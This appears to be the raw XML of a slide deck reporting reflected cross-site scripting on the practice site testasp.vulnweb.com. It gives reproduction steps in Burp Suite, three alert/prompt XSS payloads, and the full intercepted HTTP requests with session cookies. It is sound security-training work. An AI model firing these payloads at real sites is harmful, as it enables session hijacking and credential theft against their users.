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4" r:id="rId8"/>
    <p:sldId id="259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3224-715D-4881-9AB9-E243A6123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DDB7A-2D03-4AFF-8AAC-840163009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344EF-BFB6-45D4-9F25-BDE70313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0D52-FF68-4A2E-B8B9-2AA52015507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31031-A2F2-4BC9-A44D-BEB03E79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C323-249F-4E34-B734-4EDF6146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5926-8936-494D-8F1E-A263CC981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49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46F8-17AD-40F3-8FCA-90A29549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8C538-31DA-46E8-B2A0-F402C08E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C53BF-30A5-4A52-8640-B237DF65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0D52-FF68-4A2E-B8B9-2AA52015507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823DB-1DD4-4335-B783-9B747A19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12235-0700-4E37-AA3C-A2040701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5926-8936-494D-8F1E-A263CC981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46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D7B29-B6A4-4833-B6CE-C7362C9E1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E4535-70C4-4B95-A1F3-4D71CC4D3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D8F5E-BDB0-483D-8607-8B507B274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0D52-FF68-4A2E-B8B9-2AA52015507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53D6D-3FEF-4ED6-80B3-AC985BF8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10701-CA33-44B1-9395-73BFB328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5926-8936-494D-8F1E-A263CC981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14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E09B-DB56-43F5-B8A8-C03B0242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06D8F-7FEC-47C4-B9E1-83DDBFE60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8B307-4F06-4F00-B0B2-6D639F2F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0D52-FF68-4A2E-B8B9-2AA52015507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F8E22-78DB-4978-ACF7-56B82DAD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DE7A6-708A-4E75-9D62-541E24D1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5926-8936-494D-8F1E-A263CC981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8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61C1-2F3A-46DB-9B25-86B3AE27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5DC51-242A-4565-8143-D7B9C4559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E6270-5831-437E-B4E3-F078E1E4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0D52-FF68-4A2E-B8B9-2AA52015507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F0785-C868-4A7D-A93D-389BE4FC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8A578-2341-40A8-A90E-B8642DD6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5926-8936-494D-8F1E-A263CC981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35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9F87-674F-4457-A02F-13D2625C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48C19-23EA-43C1-910B-8BB6B004D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7F031-DC71-4678-A4A7-F5F72AE9C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193F4-7C29-42A8-87D9-5DAB35DA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0D52-FF68-4A2E-B8B9-2AA52015507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3EC9F-FB67-4AB4-99ED-E53F7E88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BE6E3-0802-4D63-8415-E69720EB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5926-8936-494D-8F1E-A263CC981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8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93B2-7E69-460E-815A-45805AB0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D294E-5A56-431D-9006-D31C60D6E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139DF-438A-4117-82F7-784667A5A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ADCFA-5063-47E2-B222-2F7C76374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F47B2-4633-486A-9CAB-437F227D2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5B1FD-337D-441C-A9F2-C2E66B25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0D52-FF68-4A2E-B8B9-2AA52015507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8D58F-6FA3-4342-9FA1-1313FC9B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6031D9-0EF5-48A9-A145-3F60A191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5926-8936-494D-8F1E-A263CC981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48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7EFF-8EBF-4C44-941E-D827D219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EED5E-03D7-4ECB-9E98-C1E84994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0D52-FF68-4A2E-B8B9-2AA52015507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3C1FF-DFCB-415C-88C6-29D06B28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5EB7E-3EBD-4A15-A705-48C811F4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5926-8936-494D-8F1E-A263CC981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68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BAD3A-31BA-4C7C-81BB-7103EF1C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0D52-FF68-4A2E-B8B9-2AA52015507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1EAAB-3DBA-4DC7-A758-1A4B7340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0508E-827D-42CD-87E9-A5A1255B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5926-8936-494D-8F1E-A263CC981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71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4989-AEB0-4A96-8531-9C66374F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C529-73A9-4B41-8670-38B87D873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1D622-AED9-46EE-988E-82332F822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62B4B-C358-4410-8D5E-551E5539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0D52-FF68-4A2E-B8B9-2AA52015507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2C6F4-AF22-4843-9897-951A3737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5C6F1-8FB8-4CF7-AF09-3A4BE72F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5926-8936-494D-8F1E-A263CC981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06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7F41-C127-41D8-83E4-82AD5F04D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33695-8B8E-402D-8D48-16F305454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B58BE-FF56-44BB-B072-7DEC5DE33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D965D-4B07-4CFF-8519-106C76E3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0D52-FF68-4A2E-B8B9-2AA52015507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EF8E6-5847-4835-B762-74F30FFD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3A126-7AFF-4CC1-985B-96B5C1E8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5926-8936-494D-8F1E-A263CC981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31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813F3-84CA-4361-830D-3A42C22C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51932-0D41-4EFE-8999-C5FAA15EC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A146A-6F16-449D-A7A1-8227920B0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C0D52-FF68-4A2E-B8B9-2AA520155070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361F4-9B6D-47D7-B370-884BBE3D4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6C224-36EF-4AF8-B3E4-6ACBB6026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A5926-8936-494D-8F1E-A263CC981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4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estasp.vulnwe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2B84-5173-4AE7-B05A-0BE041309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037" y="2495858"/>
            <a:ext cx="8205926" cy="186628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on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Vulnerabilities found in target URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="4000" b="1" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1155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http://testasp.vulnweb.com/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57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F07717-5E37-4689-8491-E27A0032E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62" y="1481451"/>
            <a:ext cx="9286043" cy="4818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41A06E-954F-4F49-A291-E09C6CF107ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207362" y="665825"/>
            <a:ext cx="6258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&lt;x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=alert(1)&gt;hover this!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28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B97956-AB9C-42D3-A5E6-34B8FFA62C35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692458" y="639192"/>
            <a:ext cx="92682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Material/References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attached a video demonstration of the reflected XSS injections.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name : vulnerability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demo.mkv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0ABA25-2655-4DD2-9394-109C88539E2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692458" y="2254929"/>
            <a:ext cx="1042238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000" b="1" i="0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</a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:endParaRPr lang="en-US" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3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user interaction, an attacker could execute arbitrary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code in a victim's browser.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0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="33333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3333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attacker who exploits a cross-site scripting vulnerability is typically able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Impersonate or masquerade as the victim user.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Carry out any action that the user is able to perform.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 any data that the user is able to access.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Capture the user's login credentials.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virtual defacement of the web site.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Inject trojan functionality into the web site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E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00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7602BF-5C04-4A6A-884B-1E274B3CB814}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="399495" y="195309"/>
            <a:ext cx="1123913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website http://testasp.vulnweb.com/ is vulnerable to Reflected Cross Site Scripting (XSS) into HTML context and a reflected injection of JavaScript.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Cross-site scripting works by manipulating a vulnerable website so that it returns malicious JavaScript to users. When the malicious code executes inside a victim's browser, the attacker can fully compromise their interaction with the application.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Reproduce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reproduce this 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 Visit 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http://testasp.vulnweb.com/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Step 2: On the top menu you will find a search option.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	 Step 3: Click on it and you will be prompted with the Search box.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Step 4: Intercept the request in Burp Suite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Step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Send the request to the intruder and paste all the payloads.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Here I have used the following payloads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&lt;x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=alert(1)&gt;hover this!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&lt;image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=prompt(8)&gt;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	       &lt;object data=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javascript:alert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(1)&gt;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Step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Start the attack and check whether the site is vulnerable to reflected cross site scripting.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3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5BADF3-C802-49A1-BF48-5F8F13573FC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="862614" y="69529"/>
            <a:ext cx="10466772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&lt;x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=alert(1)&gt;hover this! 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/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Search.asp?tfSearch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=%3cx%20onmouseover%3dalert(1)%3ehover%20this!%20abcd HTTP/1.1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Host: testasp.vulnweb.com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User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0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Accept: text/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html,application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xhtml+xml,application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xml;q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=0.9,image/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,*/*;q=0.8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Accept-Language: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en-US,en;q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=0.5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Accept-Encoding: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gzip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deflate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Connection: close</a:t>
            </a:r>
          </a:p>
          <a:p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http://testasp.vulnweb.com/Search.asp?tfSearch=avcd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Cookie: ASPSESSIONIDSQSBSCTQ=JIODEECCGFHFEEFDPDFPIOJC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Upgrade-Insecure-Requests: 1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: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&lt;image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onerror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=prompt(8)&gt;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/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Search.asp?tfSearch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=%3cimage%20src%2fonerror%3dprompt(8)%3eabcd HTTP/1.1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Host: testasp.vulnweb.com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User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0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Accept: text/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html,application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xhtml+xml,application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xml;q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=0.9,image/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,*/*;q=0.8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Accept-Language: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en-US,en;q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=0.5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Accept-Encoding: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gzip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deflate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Connection: close</a:t>
            </a:r>
          </a:p>
          <a:p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http://testasp.vulnweb.com/Search.asp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Cookie: ASPSESSIONIDSSTDQCSQ=PADHAAPCIPAPMKEJEEJBMFAC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Upgrade-Insecure-Requests: 1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6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DA031-328F-432F-9666-E1AC0B47D134}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="976544" y="372861"/>
            <a:ext cx="86646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: &lt;object data=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javascript:alert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(1)&gt;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/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Search.asp?tfSearch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=%3cobject%20data%3djavascript%3aalert(1)%3eabcd HTTP/1.1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Host: testasp.vulnweb.com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User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0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Accept: text/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html,application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xhtml+xml,application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xml;q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=0.9,image/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,*/*;q=0.8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Accept-Language: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en-US,en;q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=0.5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Accept-Encoding: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gzip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deflate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Connection: close</a:t>
            </a:r>
          </a:p>
          <a:p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http://testasp.vulnweb.com/Search.asp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Cookie: ASPSESSIONIDSSTDQCSQ=PADHAAPCIPAPMKEJEEJBMFAC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Upgrade-Insecure-Requests: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9F59A3-81F6-46D7-A6C8-EB09ECB08F1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="976544" y="4513373"/>
            <a:ext cx="9312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this injection happens in a GET parameter, the attacker simply needs to send the crafted Link that produces this GET request to the victim and have the victim click it.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1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3B44BA-73C5-496E-95E7-42AE09BD0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836" y="1330414"/>
            <a:ext cx="8840327" cy="53456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E39EFF-212F-4E4C-BEFE-50C39163A74D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1675836" y="-23803"/>
            <a:ext cx="784786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Request PoC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&lt;x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=alert(1)&gt;hover this!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96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5BD4CF-7CBD-4FA4-A137-29D15A12E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05" y="1206048"/>
            <a:ext cx="9188389" cy="55651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6F7868-2575-425A-9124-8ACCEF374F5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1501805" y="337351"/>
            <a:ext cx="910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&lt;image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onerror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=prompt(8)&gt;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26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3B2F33-37F5-4A87-8A2F-95D43CE8A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542" y="1034223"/>
            <a:ext cx="9138915" cy="55973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0802F4-108A-4002-B36D-8F8DAA15EFD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1526542" y="195309"/>
            <a:ext cx="873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: &lt;object data=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javascript:alert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1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7A6773-32F6-46D4-B4DE-BA7BAB8A3325}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100831" y="495384"/>
            <a:ext cx="932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Injection Demonstration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416A3-43F2-401C-92FB-FBB48A956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72" y="1832751"/>
            <a:ext cx="9328812" cy="48610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959A7E-882D-4BA6-A01B-1F244A9C9805}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097872" y="1186420"/>
            <a:ext cx="6764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&lt;image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onerror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=prompt(8)&gt;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34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8951ED-7E5E-4225-B939-D89327132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30" y="1492818"/>
            <a:ext cx="9618231" cy="49878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5F104F-027F-4DFF-83D9-4800E7745A5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1180730" y="656948"/>
            <a:ext cx="4838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: &lt;object data=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javascript:alert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(1)&gt;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7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864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Report on Vulnerabilities found in target URL http://testasp.vulnweb.com/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Vulnerability found in target URL http://testasp.vulnweb.com/</dc:title>
  <dc:creator>Ramprakash</dc:creator>
  <cp:lastModifiedBy>Ramprakash</cp:lastModifiedBy>
  <cp:revision>16</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-08-12T16:31:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-13T07:14:47Z</dcterms:modified>
</cp:coreProperties>
</file>